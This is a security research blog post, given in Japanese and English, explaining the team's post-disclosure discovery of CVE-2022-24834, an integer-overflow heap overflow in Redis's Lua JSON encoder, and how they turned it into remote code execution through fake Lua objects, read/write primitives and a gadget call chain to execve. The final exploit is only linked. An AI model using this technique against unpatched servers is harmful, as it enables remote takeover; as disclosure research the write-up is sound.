Wednesday, July 19, 2023

Fuzzing Farm #4: 0-dayエクスプロイトの開発 [CVE-2022-24834]

著者:Dronex, ptr-yudai

はじめに

 この記事は、Fuzzing Farmシリーズ全4章のパート4で、パート3の記事「Fuzzing Farm #3: パッチ解析とPoC開発」の続きです。

 Fuzzing Farmチームでは、前回の記事で紹介したように、1-dayエクスプロイトだけでなく0-dayエクスプロイトの開発にも取り組んでいます。Fuzzing Farmシリーズ最終章では、弊社エンジニアが発見した0-dayと、そのエクスプロイト開発について解説します。

 我々は1年以上前の2022年4月の段階で、CVE-2022-24834に該当するRedisの脆弱性を発見し、RCE(Remote Code Execution; 任意コマンド実行)エクスプロイトの開発を完了していました。ベンダ側も修正を急いでくれましたが、利用者側の対応に時間を要したため、前回パート3の記事から今回の投稿まで期間が空いてしまいました。しかし、先日修正が完了してベンダからの情報公開が決まったため、我々もこの記事を投稿することにしました。

CVE-2022-24834

 CVE-2022-24834はRedisのLuaインタプリタに含まれていた脆弱性で、弊社メンバーのDronexとptr-yudaiが発見・報告しました。Redisはオープンソースアプリケーションで、データベースやキャッシュなどとして世界中で利用されているデータストアです。

 この脆弱性は2022年4月に報告し、2023年7月10日に修正パッチが入りました。

 

脆弱性発見までの経緯

 今回Fuzzing Farmチームでは、オープンソースソフトウェアの中から、ユーザ数・ソフトウェアの規模・影響の大きさなどを考慮して複数のターゲット候補を選び、最終的にRedisを対象としました。

 Redisの中にも様々な機能があるため、脆弱性を探す上ではある程度対象を絞って調査した方が効率が良いです。Redisはデータストアですが、Luaインタプリタを備えており、複雑な処理を実現できるように設計されています。この機能には、過去にもCVE-2015-8080やCVE-2018-11218のような脆弱性が報告されています。そこで、今回はRedisのLua機能を重点的に調査しました。

 Lua以外にも複数の箇所で脆弱性や問題が見つかりましたが、CVE-2022-24834はエクスプロイト可能であり、また技術的に面白いと感じたため、今回のブログ記事で紹介することにしました。

脆弱性の原因

 CVE-2022-24834の原因は、Luaインタプリタの中でもJSONに関する機能にあり、コード中では json_append_string が該当します。

/* json_append_string args:
 * - lua_State
 * - JSON strbuf
 * - String (Lua stack index)
 *
 * Returns nothing. Doesn't remove string from Lua stack */
static void json_append_string(lua_State *l, strbuf_t *json, int lindex)
{
    const char *escstr;
    int i;
    const char *str;
    size_t len;

    str = lua_tolstring(l, lindex, &len);

    /* Worst case is len * 6 (all unicode escapes).
     * This buffer is reused constantly for small strings
     * If there are any excess pages, they won't be hit anyway.
     * This gains ~5% speedup. */
    strbuf_ensure_empty_length(json, len * 6 + 2);    // [1]

    strbuf_append_char_unsafe(json, '\\"');
    for (i = 0; i < len; i++) {
        escstr = char2escape[(unsigned char)str[i]];
        if (escstr)
            strbuf_append_string(json, escstr);
        else
            strbuf_append_char_unsafe(json, str[i]);
    }
    strbuf_append_char_unsafe(json, '\\"');
}

 この関数はLuaの文字列オブジェクトをJSON文字列リテラルにエンコードする関数です。例えば、Hello, 世界 という文字列は "Hello, \\u4e16\\u754c" にエンコードされます。

 コメント[1]で示した箇所では、エンコード後の文字列バッファを確保しています。先程の例からも分かるように、1文字はUnicodeエスケープで6バイトになる可能性があるので len * 6 をしており、さらにダブルクォートの2文字分を長さに足しています。

 バッファサイズの計算で算術演算が入るときは、常に整数オーバーフローを気にしましょう。今回の場合、変数 lensize_t 型で定義されているため64-bit整数となります。もしここで整数オーバーフローさせたければ (2^64 - 2) / 6 バイトの文字列をエンコードする必要がありますが、これは現実的なサイズではありません。ここに脆弱性はないのでしょうか?

strbuf_ensure_empty_length の定義を見てみましょう。

static inline void strbuf_ensure_empty_length(strbuf_t *s, int len)
{
    if (len > strbuf_empty_length(s))    // [2]
        strbuf_resize(s, s->length + len);
}

 なんと、長さの引数が int 型になっています!

 したがって、 len * 6 + 1int 型へキャストする再、整数オーバーフローが発生する可能性があります。ある程度大きい値が len に入ると、例えば次のようになります。

  • 0x200000000 * 6 + 2 = 0xc0000002-1073741822
  • 0x300000000 * 6 + 2 = 0x120000002536870914 (上位ビット切り捨て)

 整数オーバーフローが発生した場合、本来の要求サイズでバッファが確保されません。特に、整数オーバーフローの結果が負の値になった場合、コメント[2]が必ずfalseになるため、バッファのリサイズが発生しません。さらに、strbuf_append_char_unsafe は名前の通り、バッファサイズのチェックを行わずにバッファに文字を追加します。したがって、ヒープバッファオーバーフローが発生します。

 バッファオーバーフローを起こすためには、エンコード前の文字列の長さが (0x80000000 - 2) / 6 = 0x15555555 バイト必要です。これは341MiB程度なので、64-bitシステムでは現実的に可能な長さです。

エクスプロイト開発

エクスプロイトにおける課題

 ヒープバッファオーバーフローができるとはいえ、今回の状況では以下のような厳しい制約があります。

【問題1】最低でも変換文字列+2バイト書き込む必要がある。

 リサイズ前のバッファに対して0x15555557バイト書き込むため、ヒープ領域を大きく破壊します。したがって、動作に必要なデータを破壊しないように注意する必要があります。また、そもそもオーバーフローのサイズが通常のヒープ領域のサイズを大幅に超えているため、書き込みがマップされていない領域に到達してクラッシュします。

【問題2】ASLRとPIEが有効である。

 近年のアプリケーションがほとんどそうであるように、RedisもPIEが有効です。当然システムのASLRも有効であるため、何かしらの手段でアドレスをリークする必要があります。

【問題3】データがUnicodeエスケープされる。

 JSON文字列リテラルとしてエンコードしたデータがオーバーフローするため、NULL文字を含む多くの文字がUnicodeエスケープされます。したがって、単純に任意のバイト列をオーバーフローで書き込むことはできません。

【問題4】ダブルクォートが付加される。

 書き込まれるバイト列の末尾は必ず " (文字列リテラルの閉じ引用符)になります。

 まずは問題1のクラッシュを解決しなければエクスプロイトは始まりません。クラッシュの問題については、事前に巨大なデータを確保してヒープを拡張しておくことで解決します。LuaはGC(Garbage Collector)を利用しているため、ある程度大きい文字列データを確保して削除すれば、GCが発火するタイミングで解放されます。データが解放されてもメモリはマップされたままなので、ヒープバッファオーバーフローで大量のデータを書き込んでもクラッシュしません。

 また、ヒープバッファオーバーフローによってRedisが動作するのに必要なデータが破壊されてはいけません。これは事前にヒープを適切に操作しておくことで実現可能です。

 次に、問題2について実は簡単に解決できますが、これについては後述します。

 最後にエクスプロイト可能性に関わるもっとも重要な問題が、問題3と4です。ヒープオーバーフローができても、書き込めるデータに強い制約があるため、安定したエクスプロイトを書けるかが課題になります。

Luaの構造

 エクスプロイトの方針を考える前に、Luaがメモリ上でどのようにデータを管理しているかについて調べておきましょう。

 まず、Luaはメモリ管理にマーク&スイープ方式のGCを使っています。GCを強制的に発動させるビルトイン関数 collectgarbage が用意されているので、GCについてはそこまで気にする必要はありません。

 また、Luaのオブジェクトは、タグ付きの構造体 TValue で管理されます。

typedef union {
  GCObject *gc;
  void *p;
  lua_Number n;
  int b;
} Value;

#define TValuefields	Value value; int tt

typedef struct lua_TValue {
  TValuefields;
} TValue;

tt が型を表し、次のいずれかの値を取ります。

#define LUA_TNONE		(-1)

#define LUA_TNIL		0
#define LUA_TBOOLEAN		1
#define LUA_TLIGHTUSERDATA	2
#define LUA_TNUMBER		3
#define LUA_TSTRING		4
#define LUA_TTABLE		5
#define LUA_TFUNCTION		6
#define LUA_TUSERDATA		7
#define LUA_TTHREAD		8

 いくつかの重要な型について簡単に説明します。

  • LUA_TNUMBER
    • Luaのnumber型を持ちます。内部的には単純な double 型です。
  • LUA_TSTRING
    • Luaの文字列型を持ちます。メモリ上ではヘッダの直後に文字列本体が配置されます。Luaの文字列はイミュータブルで、内容の書き換えはできません。
    • 確保した文字列に対してはハッシュ値が計算され、Lua側で管理されています。これにより、同一の文字列が複数回メモリに確保されることを防いでいます。
typedef union TString {
  L_Umaxalign dummy;  /* ensures maximum alignment for strings */
  struct {
    CommonHeader;
    lu_byte reserved;
    unsigned int hash;
    size_t len;
  } tsv;
} TString;
  • LUA_TTABLE
    • Luaのテーブル型を持ちます。テーブル型は配列も連想配列も持つことができるオブジェクトです。
    • 配列として使用される場合、 TValue 配列へのポインタ array と、そのサイズ sizearray が利用されます。
typedef struct Table {
  CommonHeader;
  lu_byte flags;  /* 1<<p means tagmethod(p) is not present */
  int readonly;
  lu_byte lsizenode;  /* log2 of size of `node' array */
  struct Table *metatable;
  TValue *array;  /* array part */
  Node *node;
  Node *lastfree;  /* any free position is before this position */
  GCObject *gclist;
  int sizearray;  /* size of `array' array */
} Table;
  • LUA_TFUNCTION
    • Luaのクロージャ型を持ちます。Lua上で定義された関数へのクロージャ LClosure か、ビルトイン関数のようにC言語で定義された関数へのクロージャ CClosure が利用されます。
typedef struct CClosure {
  ClosureHeader;
  lua_CFunction f;
  TValue upvalue[1];
} CClosure;

typedef struct LClosure {
  ClosureHeader;
  struct Proto *p;
  UpVal *upvals[1];
} LClosure;

typedef union Closure {
  CClosure c;
  LClosure l;
} Closure;

Addrof primitiveの作成

 ASLRやPIEが有効な以上、問題2を解決する必要がありますが、実はこの問題は簡単に解決できます。  Luaのテーブルやビルトイン関数を tostring で文字列化すると、Luaの仕様によってそれぞれ確保されたオブジェクトのヒープ上のアドレスが文字列として返ります。つまり、オブジェクトのアドレスを取得するaddrof primitiveは、脆弱性に関係なく持っています。

 

 ヒープのアドレスが得られるため、ASLRの問題は解決できました。

 

Fakeobjの作成

 ヒープバッファオーバーフローで書き込める文字種に制限があるため、有効なアドレス値全体を書き込むことは不可能です。このような場合、主に以下の2通りのエクスプロイト手法が考えられます。

  1. 配列サイズのようなメタデータを書き換える。

     オーバーフローで書き込めるデータに制限があっても、サイズ情報のようなメタデータを書き換えて、それを起点に別の方法で攻撃できれば良いです。今回の条件ではどうでしょうか。

     まず、文字列型についてはイミュータブルなので、サイズ情報を書き換えても値の書き込みはできません。また、テーブル型の配列については、サイズ情報がポインタよりも後ろにあるため、ポインタを破壊せずにサイズ情報のみを書き換えることができません。

     したがって、今回の条件ではメタデータを書き換える方針は難しそうです。

  2. ポインタの下位バイトのみを部分的に書き換える。

     部分的にポインタを書き換えることで、偽のアドレスにポインタを向けることができます。例えばテーブル型の配列ポインタの下位1バイトを書き換えて偽の配列に向ければ、エクスプロイトに繋がりそうです。今回はこちらの方針でエクスプロイトを開発します。

 問題4でも述べたように、オーバーフローするデータの末尾は必ず " (0x22)になります。配列へのポインタの最下位バイトをこれで書き換えることで、誤ったメモリアドレスを配列へのポインタとして認識させられます。

 エクスプロイトが複雑なので図で確認してみましょう。まず、正常なテーブル(配列)は図1のような構造になっています。テーブルオブジェクトがあり、その arrayTValue の配列実体を指しています。 TValue がテーブルや文字列などポインタを持つ型であった場合、さらにそのオブジェクト実体へのポインタがあります。

 

図1. 正常なテーブルオブジェクト


 我々はヒープオーバーフローでポインタ array の最下位1バイトを " (0x22)に書き換えます。正規の配列実体より少し低いアドレスに文字列を使って偽の配列を用意しておきます。すると、図2のように、ポインタ array が偽の配列を指し、任意の偽オブジェクトを取得できます。幸いなことに、ポインタ metatable は適当な値でも、Luaのメタテーブルを使わなければクラッシュしません。

 

図2. 配列ポインタの下位1バイトを書き換えたテーブル

 問題として、最後の1バイト(0x22)がちょうど配列へのポインタ array の最下位バイトを書き換える位置に、テーブルオブジェクトを確保する必要があります。この問題は、free済みのチャンクを消費するヒープスプレーによって安定化できます。なお、偽の配列や偽のオブジェクトについては、addrof primitiveを持っているため、正確なアドレスが分かります。

 これにより、問題3と問題4を回避しつつfakeobjが作成できます。ただし、このfakeobjは1回しか使えないため、まだprimitiveとしては使えません。

AAR/AAW primitiveの作成

 より強力なprimitiveとして、任意アドレス読み書き、AAR(Arbitrary Address Read)とAAW(Arbitrary Address Write)を作っていきましょう。

 偽のオブジェクトが作成できたため、偽のテーブル構造体が作成できます。この偽配列のベースアドレスをなるべく低いアドレスにし、サイズを可能な限り大きくとります。すると、この偽配列はヒープの広い領域を参照できるテーブルになります。

図3. 偽テーブルオブジェクトの作成

 

 配列の型をnumber型にしておけば、指定アドレスにある程度自由な値を書き込めます。ただし、 TValue の性質上、単純な読み書きではありません。 TValue そのものは、値の実体(あるいはポインタ)と型情報を持った16バイトの構造体です。number型の場合、次の制約があります。

  • 書き込み:valueにdouble型の値が書き込まれる。また、型情報が LUA_TNUMBER で上書きされる。
  • 読み込み:valueからdouble型の値を読み込む。ただし、型情報が LUA_TNUMBER になっていないとassertionエラーが起きる。

 書き込みに関しては、書き込み先のアドレスより8バイト後ろに LUA_TNUMBER が同時に書き込まれる点に注意しましょう。図4のようになります。

 

図4. 任意アドレスへの書き込み

  読み込みに関しては、型情報が正しい必要があるため、読み込みたいアドレスより8バイト後ろに、事前に LUA_TNUMBER を書き込んでおく必要があります。(したがって、この方法で読み込み専用メモリを読むことはできません。)図5のようになります。

 

図5. 任意アドレスからの読み込み

 
 また、 TValue は0x10バイトなので、偽テーブルの array が指すベースアドレスからは、0x10の倍数ごとのアドレスにしか書き込めません。そこで、図6に示すように、ベースアドレス-8を指すもう1つの偽テーブルを作ります。右側に示したテーブルのアドレスとサイズは、 arraysizearray のオフセットが幸いにも0x10の倍数のため、偽テーブルからの相対書き込みで書き換えられます。

図6. AAR/AAW primitive

  これにより、ヒープ上のデータを( LUA_TNUMBER が書き込まれるという制約はありますが )自由に読み書きできる、相対的なAAR/AAW primitiveが作れました。

Addrof/Fakeobj primitiveの作成

 現状持っているaddrof primitiveは tostring を利用したものなので、テーブルや関数などの一部のオブジェクトにしか使えません。また、fakeobjも最初の1度しか利用できませんでした。

 しかし、現在はAAR/AAW primitiveを持っているため、addrof/fakeobj primitiveが作れそうです。今ヒープを完全に制御できるので、ヒープバッファオーバーフローでfakeobjを作ったときよりも簡単にfakeobjが作れます。図7のように、適当な配列の array が指す先のアドレスと型情報を書き換えれば、任意の型のオブジェクトが生成できます。

図7. fakeobj primitiveの作成


  同様に図8のように、配列にリークしたいオブジェクトを格納して、型情報を LUA_TNUMBER に書き換えておきます。すると、次に配列を読んだときにnumber型と認識するため、オブジェクトのアドレスが得られます。

図8. addrof primitiveの作成

 

最後の仕上げ:RCE

 ここまで来れば、RIPの制御は簡単です。 CClosure 型の関数はC言語で書かれた関数を呼び出します。つまり、関数ポインタを持っています。したがって、fakeobjで偽のビルトイン関数を作って呼び出せば、任意のアドレスをcallできます。

 問題は引数が制御できないことです。Redisは execve 関数を使うため、PLT(Procedure Linkage Table)から execve を呼び出せます。しかし、任意コマンド実行するためには execve の3引数を適切に渡す必要があります。このようなときは、Call Oriented Programmingで引数を制御しましょう。

 Call chainを組むときに最初に調べるのは、呼ばれている関数ポインタがどこから来たかです。関数を呼び出す luaD_precall を読むと、次のように rax+0x20 に置かれた関数ポインタが呼ばれていることが分かります。

 つまり、RAXは現在制御可能な偽関数オブジェクトを指していることになります。したがって、 call qword ptr [rax+XXX] のような命令で終わるgadgetでcall chainを構築しましょう。(関数ポインタそのものはオフセット0x20に位置するので、それ以外の場所を使ってchainを作ります。)

 Call chain中では、以下の3つの操作をすれば良いです。

  • RDX (envp)を0にする。
  • RSI (argv)に argv を入れる。
  • RDI (pathname)に argv[0] を入れる。

 まずRDXを0にするgadgetですが、次のgadgetが便利そうです。

0x000abb6a:
xor edx, edx;
xor esi, esi;
mov rdi, rbp;
call qword ptr [rax+0x38];

 次にRDIとRSIには具体的なアドレスを入れる必要があります。RAXの指すアドレスにあるデータが制御可能なので、この周辺からmovするgadgetを探します。例えば以下のgadgetが見つかります。

0x001554c8:
mov rdi, [rax];
call qword ptr [rax+0x18];

 RSIに値を入れるgadgetも以下のものが見つかります。しかし、先程のgadgetにおけるRDIのソースと同じであり、またRDXを破壊する上、callのソースが最初のgadgetと被ってしまっています。

0x000d1f3e:
mov rsi, [rax];            // conflict!
mov rdx, rbp;              // overwrite!
call qword ptr [rax+0x38]; // conflict!

 そこで、今回は次のgadgetを使いました。

0x0012718b:
mov rsi, [rdi+8];
mov rdi, [rdi];
call qword ptr [rax+0x10];

 このgadgetはRDI, RSI両方の値を設定できます。値のソースはRDIですが、これは2番目のgadgetで設定できるため問題ありません。複雑ですが、図9のような構成になります。

図9. Call Chainの構築


エクスプロイト

 最終的なエクスプロイトコードは以下のリポジトリを参照してください。修正が入る直前のコミットで動作検証をしました。

CVE-2022-24823 - RICSecLab/exploit-poc-public

 実際にエクスプロイトを動かすと、次のようにRCEできていることが確認できます。



Fuzzing Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]

Authors: Dronex, ptr-yudai

Introduction

 This article is part 4 of the Fuzzing Farm series. You can check the previous article at "Fuzzing Farm #3: Patch Analysis and PoC Development."

 The Fuzzing Farm team is not only working on 1-day exploits, but also developing 0-day exploits. In the final chapter of the Fuzzing Farm series, we will explain the 0-day vulnerability discovered by our engineers and the process for developing the exploit.

 Over a year ago in April 2022, we discovered a vulnerability in Redis related to the Lua interpreter and developed an RCE (Remote Code Execution) exploit for it. The fixes have now been completed, and the vendor has announced the information, so we decided to post this article.

CVE-2022-24834

 CVE-2022-24834 is a vulnerability in the Lua interpreter of Redis. It was discovered and reported by Dronex and ptr-yudai in the Fuzzing Farm team. Redis is an open-source software used worldwide as a datastore for databases, caches, and more.

 We reported this vulnerability in April 2022, and a fix patch was released on July 10, 2023.

 

Background to Vulnerability Discovery

 The Fuzzing Farm team selected Redis as its target among many open-source software options after considering factors such as the number of users, the size of the software, and its impact levels.

 Since Redis has many functions, it is more efficient to narrow down the targets for vulnerability searches. Redis is not just a simple data store, but it also supports Lua, which enables complicated processing. In the past, some researchers discovered several vulnerabilities in the Lua interpreter, such as CVE-2015-8080 and CVE-2018-11218. Therefore, we focused on investigating the Lua function in Redis.

 Although we found multiple vulnerabilities and issues in Redis other than Lua, we decided to explain CVE-2022-24834 in this blog post because it is exploitable and technically interesting.

Root Cause Analysis

  CVE-2022-24834 is caused by an issue with the JSON encoder in the Lua interpreter in Redis. Specifically, the issue is related to the json_append_string function.

/* json_append_string args:
 * - lua_State
 * - JSON strbuf
 * - String (Lua stack index)
 *
 * Returns nothing. Doesn't remove string from Lua stack */
static void json_append_string(lua_State *l, strbuf_t *json, int lindex)
{
    const char *escstr;
    int i;
    const char *str;
    size_t len;

    str = lua_tolstring(l, lindex, &len);

    /* Worst case is len * 6 (all unicode escapes).
     * This buffer is reused constantly for small strings
     * If there are any excess pages, they won't be hit anyway.
     * This gains ~5% speedup. */
    strbuf_ensure_empty_length(json, len * 6 + 2);    // [1]

    strbuf_append_char_unsafe(json, '\"');
    for (i = 0; i < len; i++) {
        escstr = char2escape[(unsigned char)str[i]];
        if (escstr)
            strbuf_append_string(json, escstr);
        else
            strbuf_append_char_unsafe(json, str[i]);
    }
    strbuf_append_char_unsafe(json, '\"');
}

 This function encodes Lua string objects into JSON string literals. For example, the string Hello, 世界 is encoded as "Hello, \u4e16\u754c".

 The buffer for the encoded string is allocated on line [1]. As shown in the previous example, a single character can be represented by a maximum of a 6-byte Unicode escape sequence. Therefore, the buffer is allocated with the size len * 6 + 2. Care must be taken to avoid integer overflow during this size calculation. In this case, the variable len is of type size_t, which is defined as a 64-bit integer. To cause an overflow, we would need to encode a string that is (2^64 - 2) / 6 bytes in size, which is not practical.

 The definition of strbuf_ensure_empty_length, however, is as follows:

static inline void strbuf_ensure_empty_length(strbuf_t *s, int len)
{
    if (len > strbuf_empty_length(s))    // [2]
        strbuf_resize(s, s->length + len);
}

 The length argument is defined as an int type, so there is a possibility of an integer overflow if len * 6 + 1 is cast to an int. For example:

  • 0x200000000 * 6 + 2 = 0xc00000021073741822
  • 0x300000000 * 6 + 2 = 0x120000002536870914 (truncated upper 32 bits)

 If integer overflow occurs, the buffer cannot be allocated with the intended size. Moreover, if the result of the integer overflow is a negative value, the expression on line [2] always evaluates to false, and the buffer is not resized. Additionally, strbuf_append_char_unsafe adds characters to the buffer without checking the buffer size. As a result, a heap buffer overflow occurs.

 To trigger the buffer overflow, a string of length (0x80000000 - 2) / 6 = 0x15555555 bytes is required. This is approximately 341 MiB and is a practical size for 64-bit systems.

Writing an RCE Exploit

Challenges in Exploit

 Although it is possible to cause a heap buffer overflow, there are several constraints that make the situation challenging in this case.

[Challenge 1] Large amount of overflows

 If we write 0x15555557 bytes to the buffer, which is the size of the overflow before resizing, the heap area will be heavily destroyed. Therefore, we must be careful not to destroy the data necessary for Redis to run. Also, since the size of the overflow is significantly larger than the size of the normal heap area, writing to an unmapped area will eventually cause a crash.

[Challenge 2] ASLR and PIE are enabled

 Redis is compiled with PIE, like most modern applications, and of course, ASLR is enabled on the system. We need to somehow leak the address.

[Challenge 3] Data is Unicode-escaped

 The data is encoded as a JSON string literal overflow. This means that many characters, including NULL bytes, are Unicode-escaped. Therefore, it is not possible to simply overflow arbitrary byte sequences.

[Challenge 4] A double quote is added

 The written byte sequence always ends with a " (closing quotation mark of the string literal). We need to take it into account.

 To resolve Challenge 1, we can allocate a large amount of data in advance to expand the heap and avoid a crash. As Lua uses GC (Garbage Collector), releasing somewhat large string data will free up space when the GC runs. Even if the data is released, its memory remains mapped, so overflowing a heap buffer with a large amount of data will not cause a crash.

 It is also important to manipulate the heap appropriately in advance to prevent the destruction of important structures.

 While Challenge 2 can be easily solved, we will describe this later.

 The most critical issues related to exploitability are Challenges 3 and 4. Although a heap overflow may be possible, there are significant constraints on the data that can overflow. Writing a stable exploit under these constraints can be quite challenging.

Variables in Lua

 Let's investigate how Lua manages variables in memory.

 Lua uses the mark-and-sweep garbage collector for memory management. You can force garbage collection using the built-in collectgarbage function, so you don't need to worry about it too much.

 Every Lua object is managed by a tagged structure called TValue, which handles variables.

typedef union {
  GCObject *gc;
  void *p;
  lua_Number n;
  int b;
} Value;

#define TValuefields	Value value; int tt

typedef struct lua_TValue {
  TValuefields;
} TValue;

 The member variable tt represents the type, which can take one of the following values.

#define LUA_TNONE		(-1)

#define LUA_TNIL		0
#define LUA_TBOOLEAN		1
#define LUA_TLIGHTUSERDATA	2
#define LUA_TNUMBER		3
#define LUA_TSTRING		4
#define LUA_TTABLE		5
#define LUA_TFUNCTION		6
#define LUA_TUSERDATA		7
#define LUA_TTHREAD		8

Here are some important types:

  • LUA_TNUMBER
    • Indicates the numeric type. It is internally represented as a simple double type.
  • LUA_TSTRING
    • Indicates the string type. The string body is located immediately after the header in memory. Lua strings are immutable and cannot be modified.
    • The hash value for the allocated string is calculated and managed by Lua. This prevents the same string from being allocated multiple times for efficiency.
typedef union TString {
  L_Umaxalign dummy;  /* ensures maximum alignment for strings */
  struct {
    CommonHeader;
    lu_byte reserved;
    unsigned int hash;
    size_t len;
  } tsv;
} TString;

  • LUA_TTABLE
    • Indicates the table type. A table is an object that can have either an array or an associative array.
    • When used as an array, a pointer to the TValue array (array) and its size (sizearray) are used.
typedef struct Table {
  CommonHeader;
  lu_byte flags;  /* 1<<p means tagmethod(p) is not present */
  int readonly;
  lu_byte lsizenode;  /* log2 of size of `node' array */
  struct Table *metatable;
  TValue *array;  /* array part */
  Node *node;
  Node *lastfree;  /* any free position is before this position */
  GCObject *gclist;
  int sizearray;  /* size of `array' array */
} Table;

  • LUA_TFUNCTION
    • Indicates the closure type. It is used for a closure to a function defined in Lua (LClosure), or a closure to a C-defined built-in function (CClosure).
typedef struct CClosure {
  ClosureHeader;
  lua_CFunction f;
  TValue upvalue[1];
} CClosure;

typedef struct LClosure {
  ClosureHeader;
  struct Proto *p;
  UpVal *upvals[1];
} LClosure;

typedef union Closure {
  CClosure c;
  LClosure l;
} Closure;

Creating the Addrof Primitive

 We need to solve Challenge 2 despite ASLR and PIE being enabled. However, this problem can be easily resolved. According to the Lua specification, when a Lua table or built-in function is stringified with tostring, the address of the object allocated on the heap is returned as a string. This means that the addrof primitive that obtains the object's address is available without the vulnerability.

 

 The ASLR problem can be solved if we have the heap address.

Creating a Fake Object

 It's not possible to write a valid address in the heap buffer overflow because there are limitations on the characters that can be written. In such cases, there are mainly two exploitation techniques:

  1. Metadata Corruption

    Even if there are limitations on the data, rewriting metadata such as size information might work. Let's check if it's possible under the current condition.

    First, it's not possible to write characters to a string variable even if the size information is corrupted since the string is immutable in Lua. Also, the size information is located after the pointer to the array. It's not possible to rewrite only the size information without destroying the pointer. Therefore, it seems difficult to rewrite metadata in this condition.

  2. Partial Overwrite

    We can make a pointer point to an invalid address by partially rewriting it. For example, if you rewrite the least significant byte of the array pointer to point to a fake array, it might be useful. This is the approach we took to develop the exploit this time.

 As mentioned in Challenge 4, the data that overflows always ends with " (0x22). By overwriting the least significant byte of the pointer to the array with this value, an incorrect memory address is recognized as a pointer to the array.

 A normal table (array) has a structure as shown in Figure 1. There is a table object, and its array points to the array entity of TValue type. If the TValue is a type with a pointer, such as a table or string, there is also a pointer to the object entity.

 

Figure 1. Typical table object in Lua

 

 We will overwrite the least significant byte of the pointer array with ", which has a hexadecimal value of 0x22. Next, we will prepare a fake array using a string at an address slightly lower than the regular array entity. As shown in Figure 2, the pointer array will then point to the fake array, allowing us to obtain an arbitrary fake object. Fortunately, even if the pointer metatable has a random value, the program will not crash as long as the metatable of the variable is not modified.

 

Figure 2. Table object with the least significant byte of the array pointer corrupted

 

 The issue is that you must allocate a table object at the precise position where the last byte (0x22) overwrites the least significant byte of the pointer array. One way to stabilize it is through heap spraying to consume freed chunks.

 With the addrof primitive, we can determine the exact address of the fake object, which enables us to create a fakeobj while avoiding Challenges 3 and 4. Unfortunately, this fakeobj is still not a useful primitive because it can only be used once.

Creating AAR/AAW Primitive

 Let's create more powerful primitives such as arbitrary address read (AAR) and arbitrary address write (AAW).

 It is possible to create a fake table structure as we can obtain a fake object. The base address of this fake array should be set to as low an address as possible, and the size should be made as large as possible. As a result, this fake array becomes a table that can reference a wide area of the heap.

 

Figure 3. Creating a fake table object
 

 If we set the type of the array to number, we can write relatively arbitrary values to the specified address. However, due to the nature of TValue, simple read and write operations are not possible. TValue is a 16-byte structure that holds the value entity (or pointer) and type information. In the case of number type, the following restrictions apply:

  • Write: A double type value is written to value. Additionally, the type information is overwritten with LUA_TNUMBER.
  • Read: A double type value is read from value. However, an assertion error will occur if the type information is not LUA_TNUMBER.

 Note that LUA_TNUMBER is written along with the value during writing as shown in Figure 4.

 

Figure 4. Write to arbitrary address

 

 When using the read function in Lua, it is important to write LUA_TNUMBER 8 bytes after the address to be loaded beforehand to ensure the correct type information is provided. Note that this method cannot be used to load a value from read-only memory. Refer to Figure 5 for an example illustration.

 

Figure 5. Read from arbitrary address

 Since TValue is 0x10 bytes in size, you can only write to addresses that are multiples of 0x10 from the base address pointed to by the array of the fake table. Therefore, as shown in Figure 6, we created another fake table that points to a base address 8 bytes lower. We can overwrite the address and size of the table shown on the right with a relative write from the fake table on the left, as the offsets from array to sizearray happen to be multiples of 0x10.


Figure 6. AAR/AAW primitive


 This allows us to create a relative AAR/AAW primitive that can freely read and write data on the heap, with the constraint that LUA_TNUMBER is written beforehand.

Creating Addrof/Fakeobj primitive

 The addrof primitive currently we have only works with certain objects, such as tables and functions, as it uses tostring. Additionally, fakeobj can only be used once at the beginning, limiting its utility.

 However, with the AAR/AAW primitives, we can now create addrof and fakeobj primitives. With full control over the heap, it is easy to create fake objects of any type. As shown in Figure 7, we can first overwrite the address and type information of an array element, and then create fake objects with the desired type.

 

Figure 7. Creating fakeobj primitive
 

 Similarly, as shown in Figure 8, we can store the object that you want to leak in an array and overwrite the type information to LUA_TNUMBER. This causes it to be recognized as a number when the array element is read, allowing us to obtain the address of the object.

 

Figure 8. Creating addrof primitive

 Controlling the RIP, or instruction pointer, is simple. A CClosure-type function calls a function written in C, meaning they have function pointers. By creating a fake built-in function with fakeob, we can make the program jump to any address we want.

 However, we cannot control the arguments. Redis uses execve somewhere, and it has the PLT (Procedure Linkage Table) for the function. We can use the PLT to call execve. However, to execute arbitrary commands, we need to pass three arguments to execve appropriately. In this situation, controlling the arguments with Call Oriented Programming is useful.

 When building a call chain, the first step is to identify where the function pointer comes from. Let's look at the assembly of luaD_precall, which calls the function pointer. As shown below, the function pointer is located at rax+0x20.

 

 

 In essence, RAX currently refers to a controllable fake function object. As a result, we can create a call chain using certain gadgets that ends with instructions such as call qword ptr [rax+XXX]. (The function pointer itself is located at offset 0x20; therefore, we use other locations to build the chain.)

 In the call chain, we only need to perform the following three operations:

  • Set RDX (envp) to 0.
  • Set RSI (argv) to argv.
  • Set RDI (pathname) to argv[0].

 One gadget that might prove useful for setting RDX to 0 is the following:

0x000abb6a:
xor edx, edx;
xor esi, esi;
mov rdi, rbp;
call qword ptr [rax+0x38];

 Next, we need to assign specific addresses to RDI and RSI registers. As the data pointed to by RAX is controllable, we should search for a "mov" gadget. For instance, you may find the following one:

0x001554c8:
mov rdi, [rax];
call qword ptr [rax+0x18];

 There are gadgets that can input values into the RSI register, as shown below. However, they have the same source memory as the RDI register in the previous gadget, and they destroy the RDX register. Additionally, the source memory of the last call instruction overlaps with the first gadget, rendering it useless.

0x000d1f3e:
mov rsi, [rax];            // conflict!
mov rdx, rbp;              // overwrite!
call qword ptr [rax+0x38]; // conflict!

 We used the following gadget instead.

0x0012718b:
mov rsi, [rdi+8];
mov rdi, [rdi];
call qword ptr [rax+0x10];

 This gadget can set values for both RDI and RSI. The source memory for the values is RDI, but this is not a problem as RDI is controllable with the second gadget. The entire chain can be seen in Figure 9.

 

Figure 9. Call chain
 

  The address of the gadget depends on the version of Redis. However, the gadget used in this call chain is a generic gadget that can be found in both the version at the time we discovered the vulnerability and the version at the time we published this article.

Exploit

 You can find the final exploit on the following GitHub repository. We tested it in the commit right before the patch is applied.

CVE-2022-24823 - RICSecLab/exploit-poc-public

 The following is the PoC video for this vulnerability.

 


Tuesday, July 18, 2023

Fuzzing Farm #3: Patch Analysis and PoC Development

Author: Dronex

Introduction

 This article is part 3 of the Fuzzing Farm series, which consists of 4 chapters. You can check the previous post at "Fuzzing Farm #2: Evaluating the Performance of Fuzzer."

 The Fuzzing Farm team concentrates on exploiting OSS products, including 1-day and 0-day analysis. The remaining two parts of the Fuzzing Farm series will cover our activities related to 1-day/0-day exploit development.

